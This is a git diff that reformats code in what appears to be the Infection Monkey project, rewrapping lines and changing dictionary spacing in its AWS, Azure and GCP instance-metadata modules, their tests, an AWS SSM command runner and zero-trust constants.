diff --git a/envs/monkey_zoo/blackbox/analyzers/performance_analyzer.py b/envs/monkey_zoo/blackbox/analyzers/performance_analyzer.py
index 18390e67e..30e635652 100644
--- a/envs/monkey_zoo/blackbox/analyzers/performance_analyzer.py
+++ b/envs/monkey_zoo/blackbox/analyzers/performance_analyzer.py
@@ -33,7 +33,8 @@ class PerformanceAnalyzer(Analyzer):
if self.performance_test_config.break_on_timeout and not performance_is_good_enough:
LOGGER.warning(
- "Calling breakpoint - pausing to enable investigation of island. Type 'c' to continue once you're done "
+ "Calling breakpoint - pausing to enable investigation of island. "
+ "Type 'c' to continue once you're done "
"investigating. Type 'p timings' and 'p total_time' to see performance information."
)
breakpoint()
diff --git a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/fake_monkey.py b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/fake_monkey.py
index 2a39e6353..59501b6db 100644
--- a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/fake_monkey.py
+++ b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/fake_monkey.py
@@ -1,6 +1,7 @@
import random
-from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import (
+from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.\
+ sample_multiplier.fake_ip_generator import (
FakeIpGenerator,
)
diff --git a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/sample_multiplier.py b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/sample_multiplier.py
index 7a1fb4032..981aa22a6 100644
--- a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/sample_multiplier.py
+++ b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/sample_multiplier.py
@@ -9,10 +9,12 @@ from tqdm import tqdm
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_file_parser import (
SampleFileParser,
)
-from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import (
+from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.\
+ sample_multiplier.fake_ip_generator import (
FakeIpGenerator,
)
-from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_monkey import (
+from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.\
+ sample_multiplier.fake_monkey import (
FakeMonkey,
)
diff --git a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/test_fake_ip_generator.py b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/test_fake_ip_generator.py
index 7a4f30cff..3b18032d6 100644
--- a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/test_fake_ip_generator.py
+++ b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/test_fake_ip_generator.py
@@ -1,6 +1,7 @@
from unittest import TestCase
-from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import (
+from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.\
+ sample_multiplier.fake_ip_generator import (
FakeIpGenerator,
)
diff --git a/monkey/common/cloud/aws/aws_instance.py b/monkey/common/cloud/aws/aws_instance.py
index 236cde5e1..27c56f0a5 100644
--- a/monkey/common/cloud/aws/aws_instance.py
+++ b/monkey/common/cloud/aws/aws_instance.py
@@ -9,7 +9,6 @@ from common.cloud.instance import CloudInstance
__author__ = "itay.mizeretz"
-
AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS = "169.254.169.254"
AWS_LATEST_METADATA_URI_PREFIX = "http://{0}/latest/".format(AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS)
ACCOUNT_ID_KEY = "accountId"
@@ -35,32 +34,34 @@ class AwsInstance(CloudInstance):
try:
response = requests.get(
- AWS_LATEST_METADATA_URI_PREFIX + "meta-data/instance-id", timeout=2
+ AWS_LATEST_METADATA_URI_PREFIX + "meta-data/instance-id", timeout=2
)
self.instance_id = response.text if response else None
self.region = self._parse_region(
- requests.get(
- AWS_LATEST_METADATA_URI_PREFIX + "meta-data/placement/availability-zone"
- ).text
+ requests.get(
+ AWS_LATEST_METADATA_URI_PREFIX + "meta-data/placement/availability-zone"
+ ).text
)
except (requests.RequestException, IOError) as e:
logger.debug("Failed init of AwsInstance while getting metadata: {}".format(e))
try:
self.account_id = self._extract_account_id(
- requests.get(
- AWS_LATEST_METADATA_URI_PREFIX + "dynamic/instance-identity/document", timeout=2
- ).text
+ requests.get(
+ AWS_LATEST_METADATA_URI_PREFIX + "dynamic/instance-identity/document",
+ timeout=2
+ ).text
)
except (requests.RequestException, json.decoder.JSONDecodeError, IOError) as e:
logger.debug(
- "Failed init of AwsInstance while getting dynamic instance data: {}".format(e)
+ "Failed init of AwsInstance while getting dynamic instance data: {}".format(e)
)
@staticmethod
def _parse_region(region_url_response):
# For a list of regions, see:
- # https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.RegionsAndAvailabilityZones.html
+ # https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts
+ # .RegionsAndAvailabilityZones.html
# This regex will find any AWS region format string in the response.
re_phrase = r"((?:us|eu|ap|ca|cn|sa)-[a-z]*-[0-9])"
finding = re.findall(re_phrase, region_url_response, re.IGNORECASE)
@@ -79,9 +80,11 @@ class AwsInstance(CloudInstance):
def _extract_account_id(instance_identity_document_response):
"""
Extracts the account id from the dynamic/instance-identity/document metadata path.
- Based on https://forums.aws.amazon.com/message.jspa?messageID=409028 which has a few more solutions,
+ Based on https://forums.aws.amazon.com/message.jspa?messageID=409028 which has a few more
+ solutions,
in case Amazon break this mechanism.
- :param instance_identity_document_response: json returned via the web page ../dynamic/instance-identity/document
+ :param instance_identity_document_response: json returned via the web page
+ ../dynamic/instance-identity/document
:return: The account id
"""
return json.loads(instance_identity_document_response)[ACCOUNT_ID_KEY]
diff --git a/monkey/common/cloud/aws/aws_service.py b/monkey/common/cloud/aws/aws_service.py
index 0825811a9..189d77336 100644
--- a/monkey/common/cloud/aws/aws_service.py
+++ b/monkey/common/cloud/aws/aws_service.py
@@ -20,10 +20,10 @@ logger = logging.getLogger(__name__)
def filter_instance_data_from_aws_response(response):
return [
{
- "instance_id": x[INSTANCE_ID_KEY],
- "name": x[COMPUTER_NAME_KEY],
- "os": x[PLATFORM_TYPE_KEY].lower(),
- "ip_address": x[IP_ADDRESS_KEY],
+ "instance_id":x[INSTANCE_ID_KEY],
+ "name":x[COMPUTER_NAME_KEY],
+ "os":x[PLATFORM_TYPE_KEY].lower(),
+ "ip_address":x[IP_ADDRESS_KEY],
}
for x in response[INSTANCE_INFORMATION_LIST_KEY]
]
@@ -31,12 +31,14 @@ def filter_instance_data_from_aws_response(response):
class AwsService(object):
"""
- A wrapper class around the boto3 client and session modules, which supplies various AWS services.
+ A wrapper class around the boto3 client and session modules, which supplies various AWS
+ services.
This class will assume:
1. That it's running on an EC2 instance
2. That the instance is associated with the correct IAM role. See
- https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html#iam-role for details.
+ https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html#iam-role
+ for details.
"""
region = None
@@ -48,7 +50,7 @@ class AwsService(object):
@staticmethod
def get_client(client_type, region=None):
return boto3.client(
- client_type, region_name=region if region is not None else AwsService.region
+ client_type, region_name=region if region is not None else AwsService.region
)
@staticmethod
@@ -73,7 +75,8 @@ class AwsService(object):
Get the information for all instances with the relevant roles.
This function will assume that it's running on an EC2 instance with the correct IAM role.
- See https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html#iam-role for details.
+ See https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html#iam
+ -role for details.
:raises: botocore.exceptions.ClientError if can't describe local instance information.
:return: All visible instances from this instance
diff --git a/monkey/common/cloud/aws/test_aws_instance.py b/monkey/common/cloud/aws/test_aws_instance.py
index d3c89f067..88b392d58 100644
--- a/monkey/common/cloud/aws/test_aws_instance.py
+++ b/monkey/common/cloud/aws/test_aws_instance.py
@@ -30,7 +30,6 @@ INSTANCE_IDENTITY_DOCUMENT_RESPONSE = """
}
"""
-
EXPECTED_INSTANCE_ID = "i-1234567890abcdef0"
EXPECTED_REGION = "us-west-2"
@@ -39,14 +38,14 @@ EXPECTED_ACCOUNT_ID = "123456789012"
def get_test_aws_instance(
- text={"instance_id": None, "region": None, "account_id": None},
- exception={"instance_id": None, "region": None, "account_id": None},
+ text={"instance_id":None, "region":None, "account_id":None},
+ exception={"instance_id":None, "region":None, "account_id":None},
):
with requests_mock.Mocker() as m:
# request made to get instance_id
url = f"{AWS_LATEST_METADATA_URI_PREFIX}meta-data/instance-id"
m.get(url, text=text["instance_id"]) if text["instance_id"] else m.get(
- url, exc=exception["instance_id"]
+ url, exc=exception["instance_id"]
)
# request made to get region
@@ -56,7 +55,7 @@ def get_test_aws_instance(
# request made to get account_id
url = f"{AWS_LATEST_METADATA_URI_PREFIX}dynamic/instance-identity/document"
m.get(url, text=text["account_id"]) if text["account_id"] else m.get(
- url, exc=exception["account_id"]
+ url, exc=exception["account_id"]
)
test_aws_instance_object = AwsInstance()
@@ -67,11 +66,11 @@ def get_test_aws_instance(
@pytest.fixture
def good_data_mock_instance():
return get_test_aws_instance(
- text={
- "instance_id": INSTANCE_ID_RESPONSE,
- "region": AVAILABILITY_ZONE_RESPONSE,
- "account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
- }
+ text={
+ "instance_id":INSTANCE_ID_RESPONSE,
+ "region":AVAILABILITY_ZONE_RESPONSE,
+ "account_id":INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
+ }
)
@@ -99,11 +98,11 @@ def test_get_account_id_good_data(good_data_mock_instance):
@pytest.fixture
def bad_region_data_mock_instance():
return get_test_aws_instance(
- text={
- "instance_id": INSTANCE_ID_RESPONSE,
- "region": "in-a-different-world",
- "account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
- }
+ text={
+ "instance_id":INSTANCE_ID_RESPONSE,
+ "region":"in-a-different-world",
+ "account_id":INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
+ }
)
@@ -131,11 +130,11 @@ def test_get_account_id_bad_region_data(bad_region_data_mock_instance):
@pytest.fixture
def bad_account_id_data_mock_instance():
return get_test_aws_instance(
- text={
- "instance_id": INSTANCE_ID_RESPONSE,
- "region": AVAILABILITY_ZONE_RESPONSE,
- "account_id": "who-am-i",
- }
+ text={
+ "instance_id":INSTANCE_ID_RESPONSE,
+ "region":AVAILABILITY_ZONE_RESPONSE,
+ "account_id":"who-am-i",
+ }
)
@@ -163,12 +162,12 @@ def test_get_account_id_data_bad_account_id_data(bad_account_id_data_mock_instan
@pytest.fixture
def bad_instance_id_request_mock_instance(instance_id_exception):
return get_test_aws_instance(
- text={
- "instance_id": None,
- "region": AVAILABILITY_ZONE_RESPONSE,
- "account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
- },
- exception={"instance_id": instance_id_exception, "region": None, "account_id": None},
+ text={
+ "instance_id":None,
+ "region":AVAILABILITY_ZONE_RESPONSE,
+ "account_id":INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
+ },
+ exception={"instance_id":instance_id_exception, "region":None, "account_id":None},
)
@@ -201,12 +200,12 @@ def test_get_account_id_bad_instance_id_request(bad_instance_id_request_mock_ins
@pytest.fixture
def bad_region_request_mock_instance(region_exception):
return get_test_aws_instance(
- text={
- "instance_id": INSTANCE_ID_RESPONSE,
- "region": None,
- "account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
- },
- exception={"instance_id": None, "region": region_exception, "account_id": None},
+ text={
+ "instance_id":INSTANCE_ID_RESPONSE,
+ "region":None,
+ "account_id":INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
+ },
+ exception={"instance_id":None, "region":region_exception, "account_id":None},
)
@@ -239,12 +238,12 @@ def test_get_account_id_bad_region_request(bad_region_request_mock_instance):
@pytest.fixture
def bad_account_id_request_mock_instance(account_id_exception):
return get_test_aws_instance(
- text={
- "instance_id": INSTANCE_ID_RESPONSE,
- "region": AVAILABILITY_ZONE_RESPONSE,
- "account_id": None,
- },
- exception={"instance_id": None, "region": None, "account_id": account_id_exception},
+ text={
+ "instance_id":INSTANCE_ID_RESPONSE,
+ "region":AVAILABILITY_ZONE_RESPONSE,
+ "account_id":None,
+ },
+ exception={"instance_id":None, "region":None, "account_id":account_id_exception},
)
diff --git a/monkey/common/cloud/aws/test_aws_service.py b/monkey/common/cloud/aws/test_aws_service.py
index 8b17d707d..d9ce32a57 100644
--- a/monkey/common/cloud/aws/test_aws_service.py
+++ b/monkey/common/cloud/aws/test_aws_service.py
@@ -50,9 +50,9 @@ class TestFilterInstanceDataFromAwsResponse(TestCase):
"""
self.assertEqual(
- filter_instance_data_from_aws_response(json.loads(json_response_empty)), []
+ filter_instance_data_from_aws_response(json.loads(json_response_empty)), []
)
self.assertEqual(
- filter_instance_data_from_aws_response(json.loads(json_response_full)),
- [{"instance_id": "string", "ip_address": "string", "name": "string", "os": "string"}],
+ filter_instance_data_from_aws_response(json.loads(json_response_full)),
+ [{"instance_id":"string", "ip_address":"string", "name":"string", "os":"string"}],
)
diff --git a/monkey/common/cloud/azure/azure_instance.py b/monkey/common/cloud/azure/azure_instance.py
index 186ce3c9d..289e6b942 100644
--- a/monkey/common/cloud/azure/azure_instance.py
+++ b/monkey/common/cloud/azure/azure_instance.py
@@ -9,7 +9,8 @@ from common.common_consts.timeouts import SHORT_REQUEST_TIMEOUT
LATEST_AZURE_METADATA_API_VERSION = "2019-04-30"
AZURE_METADATA_SERVICE_URL = (
- "http://169.254.169.254/metadata/instance?api-version=%s" % LATEST_AZURE_METADATA_API_VERSION
+ "http://169.254.169.254/metadata/instance?api-version=%s" %
+ LATEST_AZURE_METADATA_API_VERSION
)
logger = logging.getLogger(__name__)
@@ -18,7 +19,8 @@ logger = logging.getLogger(__name__)
class AzureInstance(CloudInstance):
"""
Access to useful information about the current machine if it's an Azure VM.
- Based on Azure metadata service: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
+ Based on Azure metadata service:
+ https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
"""
def is_instance(self):
@@ -38,13 +40,14 @@ class AzureInstance(CloudInstance):
try:
response = requests.get(
- AZURE_METADATA_SERVICE_URL,
- headers={"Metadata": "true"},
- timeout=SHORT_REQUEST_TIMEOUT,
+ AZURE_METADATA_SERVICE_URL,
+ headers={"Metadata":"true"},
+ timeout=SHORT_REQUEST_TIMEOUT,
)
# If not on cloud, the metadata URL is non-routable and the connection will fail.
- # If on AWS, should get 404 since the metadata service URL is different, so bool(response) will be false.
+ # If on AWS, should get 404 since the metadata service URL is different,
+ # so bool(response) will be false.
if response:
logger.debug("Trying to parse Azure metadata.")
self.try_parse_response(response)
@@ -52,7 +55,8 @@ class AzureInstance(CloudInstance):
logger.warning(f"Metadata response not ok: {response.status_code}")
except requests.RequestException:
logger.debug(
- "Failed to get response from Azure metadata service: This instance is not on Azure."
+ "Failed to get response from Azure metadata service: This instance is not on "
+ "Azure."
)
def try_parse_response(self, response):
diff --git a/monkey/common/cloud/azure/test_azure_instance.py b/monkey/common/cloud/azure/test_azure_instance.py
index fb1e01abb..10e372c05 100644
--- a/monkey/common/cloud/azure/test_azure_instance.py
+++ b/monkey/common/cloud/azure/test_azure_instance.py
@@ -7,108 +7,113 @@ from common.cloud.azure.azure_instance import AZURE_METADATA_SERVICE_URL, AzureI
from common.cloud.environment_names import Environment
GOOD_DATA = {
- "compute": {
- "azEnvironment": "AZUREPUBLICCLOUD",
- "isHostCompatibilityLayerVm": "true",
- "licenseType": "Windows_Client",
- "location": "westus",
- "name": "examplevmname",
- "offer": "Windows",
- "osProfile": {
- "adminUsername": "admin",
- "computerName": "examplevmname",
- "disablePasswordAuthentication": "true",
+ "compute":{
+ "azEnvironment":"AZUREPUBLICCLOUD",
+ "isHostCompatibilityLayerVm":"true",
+ "licenseType":"Windows_Client",
+ "location":"westus",
+ "name":"examplevmname",
+ "offer":"Windows",
+ "osProfile":{
+ "adminUsername":"admin",
+ "computerName":"examplevmname",
+ "disablePasswordAuthentication":"true",
},
- "osType": "linux",
- "placementGroupId": "f67c14ab-e92c-408c-ae2d-da15866ec79a",
- "plan": {"name": "planName", "product": "planProduct", "publisher": "planPublisher"},
- "platformFaultDomain": "36",
- "platformUpdateDomain": "42",
- "publicKeys": [
- {"keyData": "ssh-rsa 0", "path": "/home/user/.ssh/authorized_keys0"},
- {"keyData": "ssh-rsa 1", "path": "/home/user/.ssh/authorized_keys1"},
+ "osType":"linux",
+ "placementGroupId":"f67c14ab-e92c-408c-ae2d-da15866ec79a",
+ "plan":{"name":"planName", "product":"planProduct", "publisher":"planPublisher"},
+ "platformFaultDomain":"36",
+ "platformUpdateDomain":"42",
+ "publicKeys":[
+ {"keyData":"ssh-rsa 0", "path":"/home/user/.ssh/authorized_keys0"},
+ {"keyData":"ssh-rsa 1", "path":"/home/user/.ssh/authorized_keys1"},
],
- "publisher": "RDFE-Test-Microsoft-Windows-Server-Group",
- "resourceGroupName": "macikgo-test-may-23",
- "resourceId": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/resourceGroups/macikgo-test-may-23/"
- "providers/Microsoft.Compute/virtualMachines/examplevmname",
- "securityProfile": {"secureBootEnabled": "true", "virtualTpmEnabled": "false"},
- "sku": "Windows-Server-2012-R2-Datacenter",
- "storageProfile": {
- "dataDisks": [
+ "publisher":"RDFE-Test-Microsoft-Windows-Server-Group",
+ "resourceGroupName":"macikgo-test-may-23",
+ "resourceId":"/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/resourceGroups/macikgo-test"
+ "-may-23/"
+ "providers/Microsoft.Compute/virtualMachines/examplevmname",
+ "securityProfile":{"secureBootEnabled":"true", "virtualTpmEnabled":"false"},
+ "sku":"Windows-Server-2012-R2-Datacenter",
+ "storageProfile":{
+ "dataDisks":[
{
- "caching": "None",
- "createOption": "Empty",
- "diskSizeGB": "1024",
- "image": {"uri": ""},
- "lun": "0",
- "managedDisk": {
- "id": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
- "resourceGroups/macikgo-test-may-23/providers/"
- "Microsoft.Compute/disks/exampledatadiskname",
- "storageAccountType": "Standard_LRS",
+ "caching":"None",
+ "createOption":"Empty",
+ "diskSizeGB":"1024",
+ "image":{"uri":""},
+ "lun":"0",
+ "managedDisk":{
+ "id":"/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
+ "resourceGroups/macikgo-test-may-23/providers/"
+ "Microsoft.Compute/disks/exampledatadiskname",
+ "storageAccountType":"Standard_LRS",
},
- "name": "exampledatadiskname",
- "vhd": {"uri": ""},
- "writeAcceleratorEnabled": "false",
+ "name":"exampledatadiskname",
+ "vhd":{"uri":""},
+ "writeAcceleratorEnabled":"false",
}
],
- "imageReference": {
- "id": "",
- "offer": "UbuntuServer",
- "publisher": "Canonical",
- "sku": "16.04.0-LTS",
- "version": "latest",
+ "imageReference":{
+ "id":"",
+ "offer":"UbuntuServer",
+ "publisher":"Canonical",
+ "sku":"16.04.0-LTS",
+ "version":"latest",
},
- "osDisk": {
- "caching": "ReadWrite",
- "createOption": "FromImage",
- "diskSizeGB": "30",
- "diffDiskSettings": {"option": "Local"},
- "encryptionSettings": {"enabled": "false"},
- "image": {"uri": ""},
- "managedDisk": {
- "id": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
- "resourceGroups/macikgo-test-may-23/providers/"
- "Microsoft.Compute/disks/exampleosdiskname",
- "storageAccountType": "Standard_LRS",
+ "osDisk":{
+ "caching":"ReadWrite",
+ "createOption":"FromImage",
+ "diskSizeGB":"30",
+ "diffDiskSettings":{"option":"Local"},
+ "encryptionSettings":{"enabled":"false"},
+ "image":{"uri":""},
+ "managedDisk":{
+ "id":"/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
+ "resourceGroups/macikgo-test-may-23/providers/"
+ "Microsoft.Compute/disks/exampleosdiskname",
+ "storageAccountType":"Standard_LRS",
},
- "name": "exampleosdiskname",
- "osType": "Linux",
- "vhd": {"uri": ""},
- "writeAcceleratorEnabled": "false",
+ "name":"exampleosdiskname",
+ "osType":"Linux",
+ "vhd":{"uri":""},
+ "writeAcceleratorEnabled":"false",
},
},
- "subscriptionId": "xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx",
- "tags": "baz:bash;foo:bar",
- "version": "15.05.22",
- "vmId": "02aab8a4-74ef-476e-8182-f6d2ba4166a6",
- "vmScaleSetName": "crpteste9vflji9",
- "vmSize": "Standard_A3",
- "zone": "",
+ "subscriptionId":"xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx",
+ "tags":"baz:bash;foo:bar",
+ "version":"15.05.22",
+ "vmId":"02aab8a4-74ef-476e-8182-f6d2ba4166a6",
+ "vmScaleSetName":"crpteste9vflji9",
+ "vmSize":"Standard_A3",
+ "zone":"",
},
- "network": {
- "interface": [
+ "network":{
+ "interface":[
{
- "ipv4": {
- "ipAddress": [{"privateIpAddress": "10.144.133.132", "publicIpAddress": ""}],
- "subnet": [{"address": "10.144.133.128", "prefix": "26"}],
+ "ipv4":{
+ "ipAddress":[{"privateIpAddress":"10.144.133.132", "publicIpAddress":""}],
+ "subnet":[{"address":"10.144.133.128", "prefix":"26"}],
},
- "ipv6": {"ipAddress": []},
- "macAddress": "0011AAFFBB22",
+ "ipv6":{"ipAddress":[]},
+ "macAddress":"0011AAFFBB22",
}
]
},
}
+BAD_DATA_NOT_JSON = (
+ '\n\n
\n\n\nWaiting...\n\n\n "
+ "\n\n"
+)
-BAD_DATA_NOT_JSON = '\n\n\n\n\nWaiting...\n\n\n \n\n'
-
-
-BAD_DATA_JSON = {"": ""}
+BAD_DATA_JSON = {"":""}
def get_test_azure_instance(url, **kwargs):
diff --git a/monkey/common/cloud/gcp/gcp_instance.py b/monkey/common/cloud/gcp/gcp_instance.py
index 14e4e554a..a2858f702 100644
--- a/monkey/common/cloud/gcp/gcp_instance.py
+++ b/monkey/common/cloud/gcp/gcp_instance.py
@@ -8,13 +8,13 @@ from common.common_consts.timeouts import SHORT_REQUEST_TIMEOUT
logger = logging.getLogger(__name__)
-
GCP_METADATA_SERVICE_URL = "http://metadata.google.internal/"
class GcpInstance(CloudInstance):
"""
- Used to determine if on GCP. See https://cloud.google.com/compute/docs/storing-retrieving-metadata#runninggce
+ Used to determine if on GCP. See https://cloud.google.com/compute/docs/storing-retrieving
+ -metadata#runninggce
"""
def is_instance(self):
@@ -39,16 +39,16 @@ class GcpInstance(CloudInstance):
else:
if not response.headers["Metadata-Flavor"] == "Google":
logger.warning(
- "Got unexpected Metadata flavor: {}".format(
- response.headers["Metadata-Flavor"]
- )
+ "Got unexpected Metadata flavor: {}".format(
+ response.headers["Metadata-Flavor"]
+ )
)
else:
logger.warning(
- "On GCP, but metadata response not ok: {}".format(response.status_code)
+ "On GCP, but metadata response not ok: {}".format(response.status_code)
)
except requests.RequestException:
logger.debug(
- "Failed to get response from GCP metadata service: This instance is not on GCP"
+ "Failed to get response from GCP metadata service: This instance is not on GCP"
)
self._on_gcp = False
diff --git a/monkey/common/cmd/aws/aws_cmd_result.py b/monkey/common/cmd/aws/aws_cmd_result.py
index 1e89115ef..37eb3c6dd 100644
--- a/monkey/common/cmd/aws/aws_cmd_result.py
+++ b/monkey/common/cmd/aws/aws_cmd_result.py
@@ -10,21 +10,22 @@ class AwsCmdResult(CmdResult):
def __init__(self, command_info):
super(AwsCmdResult, self).__init__(
- self.is_successful(command_info, True),
- command_info["ResponseCode"],
- command_info["StandardOutputContent"],
- command_info["StandardErrorContent"],
+ self.is_successful(command_info, True),
+ command_info["ResponseCode"],
+ command_info["StandardOutputContent"],
+ command_info["StandardErrorContent"],
)
self.command_info = command_info
@staticmethod
def is_successful(command_info, is_timeout=False):
"""
- Determines whether the command was successful. If it timed out and was still in progress, we assume it worked.
+ Determines whether the command was successful. If it timed out and was still in progress,
+ we assume it worked.
:param command_info: Command info struct (returned by ssm.get_command_invocation)
:param is_timeout: Whether the given command timed out
:return: True if successful, False otherwise.
"""
return (command_info["Status"] == "Success") or (
- is_timeout and (command_info["Status"] == "InProgress")
+ is_timeout and (command_info["Status"] == "InProgress")
)
diff --git a/monkey/common/cmd/aws/aws_cmd_runner.py b/monkey/common/cmd/aws/aws_cmd_runner.py
index 1ccdd104b..1b29625cf 100644
--- a/monkey/common/cmd/aws/aws_cmd_runner.py
+++ b/monkey/common/cmd/aws/aws_cmd_runner.py
@@ -38,8 +38,8 @@ class AwsCmdRunner(CmdRunner):
def run_command_async(self, command_line):
doc_name = "AWS-RunShellScript" if self.is_linux else "AWS-RunPowerShellScript"
command_res = self.ssm.send_command(
- DocumentName=doc_name,
- Parameters={"commands": [command_line]},
- InstanceIds=[self.instance_id],
+ DocumentName=doc_name,
+ Parameters={"commands":[command_line]},
+ InstanceIds=[self.instance_id],
)
return command_res["Command"]["CommandId"]
diff --git a/monkey/common/cmd/cmd_runner.py b/monkey/common/cmd/cmd_runner.py
index 57966d0b5..bb3f8805a 100644
--- a/monkey/common/cmd/cmd_runner.py
+++ b/monkey/common/cmd/cmd_runner.py
@@ -21,8 +21,10 @@ class CmdRunner(object):
* command id - any unique identifier of a command which was already run
* command result - represents the result of running a command. Always of type CmdResult
* command status - represents the current status of a command. Always of type CmdStatus
- * command info - Any consistent structure representing additional information of a command which was already run
- * instance - a machine that commands will be run on. Can be any dictionary with 'instance_id' as a field
+ * command info - Any consistent structure representing additional information of a command
+ which was already run
+ * instance - a machine that commands will be run on. Can be any dictionary with 'instance_id'
+ as a field
* instance_id - any unique identifier of an instance (machine). Can be of any format
"""
@@ -49,7 +51,8 @@ class CmdRunner(object):
"""
Run multiple commands on various instances
:param instances: List of instances.
- :param inst_to_cmd: Function which receives an instance, runs a command asynchronously and returns Cmd
+ :param inst_to_cmd: Function which receives an instance, runs a command asynchronously
+ and returns Cmd
:param inst_n_cmd_res_to_res: Function which receives an instance and CmdResult
and returns a parsed result (of any format)
:return: Dictionary with 'instance_id' as key and parsed result as value
@@ -92,7 +95,7 @@ class CmdRunner(object):
while (curr_time - init_time < timeout) and (len(commands) != 0):
for command in list(
- commands
+ commands
): # list(commands) clones the list. We do so because we remove items inside
CmdRunner._process_command(command, commands, results, True)
@@ -105,9 +108,9 @@ class CmdRunner(object):
for command, result in results:
if not result.is_success:
logger.error(
- "The following command failed: `%s`. status code: %s",
- str(command[1]),
- str(result.status_code),
+ "The following command failed: `%s`. status code: %s",
+ str(command[1]),
+ str(result.status_code),
)
return results
@@ -154,7 +157,7 @@ class CmdRunner(object):
try:
command_info = c_runner.query_command(c_id)
if (not should_process_only_finished) or c_runner.get_command_status(
- command_info
+ command_info
) != CmdStatus.IN_PROGRESS:
commands.remove(command)
results.append((command, c_runner.get_command_result(command_info)))
diff --git a/monkey/common/common_consts/zero_trust_consts.py b/monkey/common/common_consts/zero_trust_consts.py
index 539bb7265..ecf870baa 100644
--- a/monkey/common/common_consts/zero_trust_consts.py
+++ b/monkey/common/common_consts/zero_trust_consts.py
@@ -1,8 +1,10 @@
"""
-This file contains all the static data relating to Zero Trust. It is mostly used in the zero trust report generation and
+This file contains all the static data relating to Zero Trust. It is mostly used in the zero
+trust report generation and
in creating findings.
-This file contains static mappings between zero trust components such as: pillars, principles, tests, statuses.
+This file contains static mappings between zero trust components such as: pillars, principles,
+tests, statuses.
Some of the mappings are computed when this module is loaded.
"""
@@ -79,17 +81,24 @@ PRINCIPLE_DISASTER_RECOVERY = "data_backup"
PRINCIPLE_SECURE_AUTHENTICATION = "secure_authentication"
PRINCIPLE_MONITORING_AND_LOGGING = "monitoring_and_logging"
PRINCIPLES = {
- PRINCIPLE_SEGMENTATION: "Apply segmentation and micro-segmentation inside your network.",
- PRINCIPLE_ANALYZE_NETWORK_TRAFFIC: "Analyze network traffic for malicious activity.",
- PRINCIPLE_USER_BEHAVIOUR: "Adopt security user behavior analytics.",
- PRINCIPLE_ENDPOINT_SECURITY: "Use anti-virus and other traditional endpoint security solutions.",
- PRINCIPLE_DATA_CONFIDENTIALITY: "Ensure data's confidentiality by encrypting it.",
- PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES: "Configure network policies to be as restrictive as possible.",
- PRINCIPLE_USERS_MAC_POLICIES: "Users' permissions to the network and to resources should be MAC (Mandatory "
- "Access Control) only.",
- PRINCIPLE_DISASTER_RECOVERY: "Ensure data and infrastructure backups for disaster recovery scenarios.",
- PRINCIPLE_SECURE_AUTHENTICATION: "Ensure secure authentication process's.",
- PRINCIPLE_MONITORING_AND_LOGGING: "Ensure monitoring and logging in network resources.",
+ PRINCIPLE_SEGMENTATION:"Apply segmentation and micro-segmentation inside your "
+ ""
+ ""
+ "network.",
+ PRINCIPLE_ANALYZE_NETWORK_TRAFFIC:"Analyze network traffic for malicious activity.",
+ PRINCIPLE_USER_BEHAVIOUR:"Adopt security user behavior analytics.",
+ PRINCIPLE_ENDPOINT_SECURITY:"Use anti-virus and other traditional endpoint "
+ "security solutions.",
+ PRINCIPLE_DATA_CONFIDENTIALITY:"Ensure data's confidentiality by encrypting it.",
+ PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES:"Configure network policies to be as restrictive as "
+ "possible.",
